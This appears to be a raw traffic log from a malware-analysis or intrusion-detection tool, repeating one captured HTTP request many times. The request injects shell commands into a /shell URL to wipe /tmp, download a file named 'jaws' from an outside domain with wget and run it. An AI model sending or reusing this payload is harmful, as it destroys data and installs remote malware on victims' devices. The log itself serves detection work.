        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
